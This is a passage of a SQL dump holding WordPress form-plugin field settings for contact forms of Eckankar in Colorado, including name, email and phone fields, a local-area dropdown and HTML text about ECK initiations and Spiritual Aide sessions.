apply.'),(4031,131,'objectType','Field','objectType','Field'),(4032,131,'objectDomain','fields','objectDomain','fields'),(4033,131,'editActive','','editActive',''),(4034,131,'order','12','order','12'),(4035,131,'type','submit','type','submit'),(4036,131,'label','Submit','label','Submit'),(4037,131,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(4038,131,'show_help','0','show_help','0'),(4039,131,'help_text','','help_text',''),(4040,131,'show_desc','0','show_desc','0'),(4041,131,'desc_pos','none','desc_pos','none'),(4042,131,'desc_text','','desc_text',''),(4043,131,'processing_label','Processing','processing_label','Processing'),(4044,131,'element_class','','element_class',''),(4045,131,'key','submit_43','key','submit_43'),(4046,131,'container_class','','container_class',''),(4047,131,'parent_id','12','parent_id','12'),(4048,132,'type','html','type','html'),(4049,132,'order','1','order','1'),(4050,132,'fav_id','','fav_id',''),(4051,132,'def_id','','def_id',''),(4052,132,'label','Text','label','Text'),(4053,132,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(4054,132,'default_value','<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Eckankar In Colorado Contact Form</span></span></span></strong></span></h3>\r\nPlease Enter Your Information Below','default_value','<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Eckankar In Colorado Contact Form</span></span></span></strong></span></h3>\r\nPlease Enter Your Information Below'),(4055,132,'desc_el','div','desc_el','div'),(4056,132,'show_desc','0','show_desc','0'),(4057,132,'desc_pos','none','desc_pos','none'),(4058,132,'desc_text','','desc_text',''),(4059,132,'element_class','','element_class',''),(4060,132,'default','<p></p>\n<p></p>\n<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Eckankar In Colorado Contact Form</span></span></span></strong></span></h3>\n\nPlease Enter Your Information Below','default','<p></p>\n<p></p>\n<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Eckankar In Colorado Contact Form</span></span></span></strong></span></h3>\n\nPlease Enter Your Information Below'),(4061,132,'key','html_267','key','html_267'),(4062,132,'parent_id','13','parent_id','13'),(4063,133,'type','textbox','type','textbox'),(4064,133,'order','2','order','2'),(4065,133,'fav_id','','fav_id',''),(4066,133,'def_id','6','def_id','6'),(4067,133,'label','First Name','label','First Name'),(4068,133,'label_pos','above','label_pos','above'),(4069,133,'mask','','mask',''),(4070,133,'datepicker','0','datepicker','0'),(4071,133,'first_name','1','first_name','1'),(4072,133,'last_name','0','last_name','0'),(4073,133,'from_name','0','from_name','0'),(4074,133,'user_info_field_group','1','user_info_field_group','1'),(4075,133,'show_help','0','show_help','0'),(4076,133,'help_text','','help_text',''),(4077,133,'calc_auto_include','0','calc_auto_include','0'),(4078,133,'calc_option','0','calc_option','0'),(4079,133,'placeholder','','placeholder',''),(4080,133,'user_address_1','','user_address_1',''),(4081,133,'user_address_2','','user_address_2',''),(4082,133,'user_city','','user_city',''),(4083,133,'user_zip','','user_zip',''),(4084,133,'user_phone','','user_phone',''),(4085,133,'user_email','','user_email',''),(4086,133,'disable_input','0','disable_input','0'),(4087,133,'input_limit','','input_limit',''),(4088,133,'input_limit_type','char','input_limit_type','char'),(4089,133,'input_limit_msg','','input_limit_msg',''),(4090,133,'user_state','0','user_state','0'),(4091,133,'autocomplete_off','0','autocomplete_off','0'),(4092,133,'num_sort','0','num_sort','0'),(4093,133,'admin_label','','admin_label',''),(4094,133,'user_info_field_group_name','','user_info_field_group_name',''),(4095,133,'user_info_field_group_custom','','user_info_field_group_custom',''),(4096,133,'show_desc','0','show_desc','0'),(4097,133,'desc_pos','none','desc_pos','none'),(4098,133,'desc_text','','desc_text',''),(4099,133,'element_class','','element_class',''),(4100,133,'required','1','required','1'),(4101,133,'key','textbox_268','key','textbox_268'),(4102,133,'parent_id','13','parent_id','13'),(4103,134,'type','lastname','type','lastname'),(4104,134,'order','3','order','3'),(4105,134,'fav_id','','fav_id',''),(4106,134,'def_id','7','def_id','7'),(4107,134,'label','Last Name','label','Last Name'),(4108,134,'label_pos','above','label_pos','above'),(4109,134,'mask','','mask',''),(4110,134,'datepicker','0','datepicker','0'),(4111,134,'first_name','0','first_name','0'),(4112,134,'from_name','0','from_name','0'),(4113,134,'user_info_field_group','1','user_info_field_group','1'),(4114,134,'show_help','0','show_help','0'),(4115,134,'help_text','','help_text',''),(4116,134,'calc_auto_include','0','calc_auto_include','0'),(4117,134,'calc_option','0','calc_option','0'),(4118,134,'placeholder','','placeholder',''),(4119,134,'user_address_1','','user_address_1',''),(4120,134,'user_address_2','','user_address_2',''),(4121,134,'user_city','','user_city',''),(4122,134,'user_zip','','user_zip',''),(4123,134,'user_phone','','user_phone',''),(4124,134,'user_email','','user_email',''),(4125,134,'disable_input','0','disable_input','0'),(4126,134,'input_limit','','input_limit',''),(4127,134,'input_limit_type','char','input_limit_type','char'),(4128,134,'input_limit_msg','','input_limit_msg',''),(4129,134,'user_state','0','user_state','0'),(4130,134,'autocomplete_off','0','autocomplete_off','0'),(4131,134,'num_sort','0','num_sort','0'),(4132,134,'admin_label','','admin_label',''),(4133,134,'user_info_field_group_name','','user_info_field_group_name',''),(4134,134,'user_info_field_group_custom','','user_info_field_group_custom',''),(4135,134,'show_desc','0','show_desc','0'),(4136,134,'desc_pos','none','desc_pos','none'),(4137,134,'desc_text','','desc_text',''),(4138,134,'element_class','','element_class',''),(4139,134,'required','1','required','1'),(4140,134,'key','lastname_269','key','lastname_269'),(4141,134,'parent_id','13','parent_id','13'),(4142,135,'type','email','type','email'),(4143,135,'order','4','order','4'),(4144,135,'fav_id','','fav_id',''),(4145,135,'def_id','14','def_id','14'),(4146,135,'label','Email','label','Email'),(4147,135,'label_pos','above','label_pos','above'),(4148,135,'mask','','mask',''),(4149,135,'datepicker','0','datepicker','0'),(4150,135,'first_name','0','first_name','0'),(4151,135,'last_name','0','last_name','0'),(4152,135,'from_name','0','from_name','0'),(4153,135,'user_address_1','0','user_address_1','0'),(4154,135,'user_address_2','0','user_address_2','0'),(4155,135,'user_city','0','user_city','0'),(4156,135,'user_zip','0','user_zip','0'),(4157,135,'user_phone','0','user_phone','0'),(4158,135,'user_info_field_group','1','user_info_field_group','1'),(4159,135,'show_help','0','show_help','0'),(4160,135,'help_text','','help_text',''),(4161,135,'calc_auto_include','0','calc_auto_include','0'),(4162,135,'calc_option','0','calc_option','0'),(4163,135,'placeholder','','placeholder',''),(4164,135,'disable_input','0','disable_input','0'),(4165,135,'input_limit','','input_limit',''),(4166,135,'input_limit_type','char','input_limit_type','char'),(4167,135,'input_limit_msg','','input_limit_msg',''),(4168,135,'user_state','0','user_state','0'),(4169,135,'autocomplete_off','0','autocomplete_off','0'),(4170,135,'num_sort','0','num_sort','0'),(4171,135,'admin_label','','admin_label',''),(4172,135,'user_info_field_group_name','','user_info_field_group_name',''),(4173,135,'user_info_field_group_custom','','user_info_field_group_custom',''),(4174,135,'show_desc','0','show_desc','0'),(4175,135,'desc_pos','none','desc_pos','none'),(4176,135,'desc_text','','desc_text',''),(4177,135,'element_class','','element_class',''),(4178,135,'required','1','required','1'),(4179,135,'key','email_270','key','email_270'),(4180,135,'parent_id','13','parent_id','13'),(4181,136,'type','hr','type','hr'),(4182,136,'order','5','order','5'),(4183,136,'fav_id','','fav_id',''),(4184,136,'def_id','','def_id',''),(4185,136,'label','hr','label','hr'),(4186,136,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(4187,136,'show_desc','0','show_desc','0'),(4188,136,'desc_pos','none','desc_pos','none'),(4189,136,'desc_text','','desc_text',''),(4190,136,'element_class','','element_class',''),(4191,136,'key','hr_273','key','hr_273'),(4192,136,'parent_id','13','parent_id','13'),(4193,137,'type','textbox','type','textbox'),(4194,137,'order','6','order','6'),(4195,137,'fav_id','','fav_id',''),(4196,137,'def_id','','def_id',''),(4197,137,'label','Message Subject','label','Message Subject'),(4198,137,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(4199,137,'label_pos','above','label_pos','above'),(4200,137,'placeholder','','placeholder',''),(4201,137,'first_name','','first_name',''),(4202,137,'last_name','','last_name',''),(4203,137,'user_address_1','','user_address_1',''),(4204,137,'user_address_2','','user_address_2',''),(4205,137,'user_city','','user_city',''),(4206,137,'user_zip','','user_zip',''),(4207,137,'user_phone','','user_phone',''),(4208,137,'user_email','','user_email',''),(4209,137,'user_info_field_group','1','user_info_field_group','1'),(4210,137,'disable_input','0','disable_input','0'),(4211,137,'mask','','mask',''),(4212,137,'input_limit','','input_limit',''),(4213,137,'input_limit_type','char','input_limit_type','char'),(4214,137,'calc_auto_include','0','calc_auto_include','0'),(4215,137,'datepicker','0','datepicker','0'),(4216,137,'user_state','0','user_state','0'),(4217,137,'autocomplete_off','0','autocomplete_off','0'),(4218,137,'num_sort','0','num_sort','0'),(4219,137,'admin_label','','admin_label',''),(4220,137,'user_info_field_group_name','','user_info_field_group_name',''),(4221,137,'user_info_field_group_custom','','user_info_field_group_custom',''),(4222,137,'show_help','0','show_help','0'),(4223,137,'help_text','','help_text',''),(4224,137,'show_desc','0','show_desc','0'),(4225,137,'desc_pos','none','desc_pos','none'),(4226,137,'desc_text','','desc_text',''),(4227,137,'element_class','','element_class',''),(4228,137,'required','1','required','1'),(4229,137,'key','textbox_303','key','textbox_303'),(4230,137,'parent_id','13','parent_id','13'),(4231,138,'type','textarea','type','textarea'),(4232,138,'order','7','order','7'),(4233,138,'fav_id','','fav_id',''),(4234,138,'def_id','','def_id',''),(4235,138,'label','Enter Your Message Here','label','Enter Your Message Here'),(4236,138,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(4237,138,'label_pos','above','label_pos','above'),(4238,138,'default_value','','default_value',''),(4239,138,'textarea_rte','0','textarea_rte','0'),(4240,138,'textarea_media','0','textarea_media','0'),(4241,138,'disable_rte_mobile','0','disable_rte_mobile','0'),(4242,138,'input_limit','','input_limit',''),(4243,138,'input_limit_type','char','input_limit_type','char'),(4244,138,'calc_auto_include','0','calc_auto_include','0'),(4245,138,'num_sort','0','num_sort','0'),(4246,138,'admin_label','','admin_label',''),(4247,138,'show_help','0','show_help','0'),(4248,138,'help_text','','help_text',''),(4249,138,'show_desc','0','show_desc','0'),(4250,138,'desc_pos','none','desc_pos','none'),(4251,138,'desc_text','','desc_text',''),(4252,138,'element_class','','element_class',''),(4253,138,'required','1','required','1'),(4254,138,'default','','default',''),(4255,138,'key','textarea_276','key','textarea_276'),(4256,138,'parent_id','13','parent_id','13'),(4257,139,'type','html','type','html'),(4258,139,'order','8','order','8'),(4259,139,'fav_id','','fav_id',''),(4260,139,'def_id','','def_id',''),(4261,139,'label','Text','label','Text'),(4262,139,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(4263,139,'default_value','Your email address and other information will not be shared with any third parties for any reason. It will only be used to respond to your request.','default_value','Your email address and other information will not be shared with any third parties for any reason. It will only be used to respond to your request.'),(4264,139,'desc_el','div','desc_el','div'),(4265,139,'show_desc','0','show_desc','0'),(4266,139,'desc_pos','none','desc_pos','none'),(4267,139,'desc_text','','desc_text',''),(4268,139,'element_class','','element_class',''),(4269,139,'default','Your email address and other information will not be shared with any third parties for any reason. It will only be used to respond to your request.','default','Your email address and other information will not be shared with any third parties for any reason. It will only be used to respond to your request.'),(4270,139,'key','html_305','key','html_305'),(4271,139,'parent_id','13','parent_id','13'),(17620,636,'container_class','','container_class',''),(17523,626,'key','html_1663798148731','key','html_1663798148731'),(17524,626,'drawerDisabled','','drawerDisabled',''),(17525,627,'editActive','','editActive',''),(17522,626,'element_class','','element_class',''),(4285,141,'type','submit','type','submit'),(4286,141,'order','10','order','10'),(4287,141,'fav_id','','fav_id',''),(4288,141,'def_id','','def_id',''),(4289,141,'label','Submit','label','Submit'),(4290,141,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(4291,141,'show_help','0','show_help','0'),(4292,141,'help_text','','help_text',''),(4293,141,'show_desc','0','show_desc','0'),(4294,141,'desc_pos','none','desc_pos','none'),(4295,141,'desc_text','','desc_text',''),(4296,141,'processing_label','Processing','processing_label','Processing'),(4297,141,'element_class','','element_class',''),(4298,141,'key','submit_278','key','submit_278'),(4299,141,'parent_id','13','parent_id','13'),(4300,142,'objectType','Field','objectType','Field'),(4301,142,'objectDomain','fields','objectDomain','fields'),(4302,142,'editActive','','editActive',''),(4303,142,'order','1','order','1'),(4304,142,'label','HTML','label','HTML'),(4305,142,'type','html','type','html'),(4306,142,'default','<p></p><p></p><p></p><h3><span style=\"color: #23507d;\"><strong>Johnstown Initiator and ESA\'s</strong></span></h3><strong>ECK Initiations</strong> link Soul directly to the ECK, Divine Spirit, for spiritual liberation in this lifetime. Each initiation is a sacred and joyous occasion for a spiritual seeker, for it brings an ever-increasing knowledge of and love for God. And it gives new insights into why certain things in your life play out as they do.<p></p><p><strong>ECK Spiritual Aide</strong> sessions, though not counseling, can help you find your own answers in challenging situations through the personal guidance of Divine Spirit. The ESA session is conducted by an ECK Spiritual Aide, (ESA) who is an ECK cleric specially appointed and trained to offer this assistance. There are no fees for the above services, but donations to Eckankar are accepted. Because of the sacred nature of these events, the initiators and ESA\'s will call you instead of sending an email. A personal call ensures your privacy. If you have a pink slip for an ECK Initiation or would like to talk to an ECK Spiritual Aide, just select the person you would like to contact below.</p>','default','<p></p><p></p><p></p><h3><span style=\"color: #23507d;\"><strong>Johnstown Initiator and ESA\'s</strong></span></h3><strong>ECK Initiations</strong> link Soul directly to the ECK, Divine Spirit, for spiritual liberation in this lifetime. Each initiation is a sacred and joyous occasion for a spiritual seeker, for it brings an ever-increasing knowledge of and love for God. And it gives new insights into why certain things in your life play out as they do.<p></p><p><strong>ECK Spiritual Aide</strong> sessions, though not counseling, can help you find your own answers in challenging situations through the personal guidance of Divine Spirit. The ESA session is conducted by an ECK Spiritual Aide, (ESA) who is an ECK cleric specially appointed and trained to offer this assistance. There are no fees for the above services, but donations to Eckankar are accepted. Because of the sacred nature of these events, the initiators and ESA\'s will call you instead of sending an email. A personal call ensures your privacy. If you have a pink slip for an ECK Initiation or would like to talk to an ECK Spiritual Aide, just select the person you would like to contact below.</p>'),(4307,142,'container_class','','container_class',''),(4308,142,'element_class','','element_class',''),(4309,142,'key','html_1515012877904','key','html_1515012877904'),(4310,142,'drawerDisabled','','drawerDisabled',''),(4311,142,'parent_id','14','parent_id','14'),(4312,143,'objectType','Field','objectType','Field'),(4313,143,'objectDomain','fields','objectDomain','fields'),(4314,143,'editActive','','editActive',''),(4315,143,'order','2','order','2'),(4316,143,'label','First Name','label','First Name'),(4317,143,'type','firstname','type','firstname'),(4318,143,'key','firstname_1515012036721','key','firstname_1515012036721'),(4319,143,'label_pos','default','label_pos','default'),(4320,143,'required','1','required','1'),(4321,143,'default','','default',''),(4322,143,'placeholder','','placeholder',''),(4323,143,'container_class','one-half first','container_class','one-half first'),(4324,143,'element_class','','element_class',''),(4325,143,'admin_label','','admin_label',''),(4326,143,'help_text','','help_text',''),(4327,143,'parent_id','14','parent_id','14'),(4328,144,'objectType','Field','objectType','Field'),(4329,144,'objectDomain','fields','objectDomain','fields'),(4330,144,'editActive','','editActive',''),(4331,144,'order','3','order','3'),(4332,144,'label','Last Name','label','Last Name'),(4333,144,'type','lastname','type','lastname'),(4334,144,'key','lastname_1515012040393','key','lastname_1515012040393'),(4335,144,'label_pos','default','label_pos','default'),(4336,144,'required','1','required','1'),(4337,144,'default','','default',''),(4338,144,'placeholder','','placeholder',''),(4339,144,'container_class','one-half','container_class','one-half'),(4340,144,'element_class','','element_class',''),(4341,144,'admin_label','','admin_label',''),(4342,144,'help_text','','help_text',''),(4343,144,'parent_id','14','parent_id','14'),(4344,145,'objectType','Field','objectType','Field'),(4345,145,'objectDomain','fields','objectDomain','fields'),(4346,145,'editActive','','editActive',''),(4347,145,'order','4','order','4'),(4348,145,'label','Email','label','Email'),(4349,145,'type','email','type','email'),(4350,145,'key','email_1515012046399','key','email_1515012046399'),(4351,145,'label_pos','default','label_pos','default'),(4352,145,'required','1','required','1'),(4353,145,'default','','default',''),(4354,145,'placeholder','','placeholder',''),(4355,145,'container_class','one-half first','container_class','one-half first'),(4356,145,'element_class','','element_class',''),(4357,145,'admin_label','','admin_label',''),(4358,145,'help_text','','help_text',''),(4359,145,'parent_id','14','parent_id','14'),(4360,146,'objectType','Field','objectType','Field'),(4361,146,'objectDomain','fields','objectDomain','fields'),(4362,146,'editActive','','editActive',''),(4363,146,'order','5','order','5'),(4364,146,'label','Phone','label','Phone'),(4365,146,'type','phone','type','phone'),(4366,146,'key','phone_1515012055554','key','phone_1515012055554'),(4367,146,'label_pos','default','label_pos','default'),(4368,146,'required','1','required','1'),(4369,146,'default','','default',''),(4370,146,'placeholder','','placeholder',''),(4371,146,'container_class','one-half','container_class','one-half'),(4372,146,'element_class','','element_class',''),(4373,146,'input_limit','','input_limit',''),(4374,146,'input_limit_type','characters','input_limit_type','characters'),(4375,146,'input_limit_msg','Character(s) left','input_limit_msg','Character(s) left'),(4376,146,'manual_key','','manual_key',''),(4377,146,'admin_label','','admin_label',''),(4378,146,'help_text','','help_text',''),(4379,146,'mask','','mask',''),(4380,146,'custom_mask','','custom_mask',''),(4381,146,'drawerDisabled','','drawerDisabled',''),(4382,146,'parent_id','14','parent_id','14'),(4383,147,'objectType','Field','objectType','Field'),(4384,147,'objectDomain','fields','objectDomain','fields'),(4385,147,'editActive','','editActive',''),(4386,147,'order','6','order','6'),(4387,147,'label','Your Local Area','label','Your Local Area'),(4388,147,'type','listselect','type','listselect'),(4389,147,'key','your_local_area_1515013258725','key','your_local_area_1515013258725'),(4390,147,'label_pos','above','label_pos','above'),(4391,147,'required','1','required','1'),(4392,147,'options','a:8:{i:0;a:9:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Please Select\";s:5:\"value\";s:16:\"Please Selectone\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";s:1:\"1\";}i:1;a:9:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:7:\"Boulder\";s:5:\"value\";s:7:\"Boulder\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"1\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";s:1:\"1\";}i:2;a:9:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:10:\"Co Springs\";s:5:\"value\";s:10:\"Co Springs\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"2\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";s:1:\"1\";}i:3;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"order\";s:1:\"3\";s:3:\"new\";s:0:\"\";s:7:\"options\";a:0:{}s:5:\"label\";s:6:\"Denver\";s:5:\"value\";s:6:\"Denver\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";s:1:\"1\";}i:4;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"order\";s:1:\"4\";s:3:\"new\";s:0:\"\";s:7:\"options\";a:0:{}s:5:\"label\";s:8:\"Loveland\";s:5:\"value\";s:8:\"Loveland\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";s:1:\"1\";}i:5;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"order\";s:1:\"5\";s:3:\"new\";s:0:\"\";s:7:\"options\";a:0:{}s:5:\"label\";s:13:\"Western Slope\";s:5:\"value\";s:13:\"Western Slope\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons 